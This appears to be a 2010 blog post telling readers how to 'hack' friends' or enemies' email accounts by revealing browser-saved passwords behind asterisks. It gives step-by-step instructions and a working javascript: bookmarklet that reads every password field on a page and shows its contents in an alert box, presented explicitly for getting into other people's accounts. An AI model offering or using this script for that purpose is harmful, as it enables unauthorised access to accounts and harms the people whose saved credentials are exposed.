Sunday 5 December 2010

How To Find Out The Password Hidden Behind The Asterisk Sign?



Friends, we often wonder to hack our friends or enemies email id. But in your mind hacking is a account hacking is a hard job. But don't worry. Here I am going to show you a trick that will help you to find out your friends password with a great ease.

We often save our password on our PC for our help. But we don't know that this trick can sometimes harm us. The that I am going to show, only works on the PC in which the password is saved. So, lets start...

Steps:


1.  Just open any web browser, and open any website for which username and passwords are stored already on the computer you are using.
lets say www.gmail.com

2.  Now if any username and password are stored on your system for gmail, then it will be visible in login area, as username and ***** stars in place of password.

3. Now if you want to see the hidden password behind these stars, then just copy the given javacode and replace it with url of gmail in addressbar of ur browser. and press enter.


Javascript Code:



 javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for 
(i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } 
if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in 
forms on this page.");})();

--------------------------------------------------------------------------------------------------------------------------------------------------------------------
 

4.  As you follow the 3rd step, the passwords will show you in a alert box

7 comments: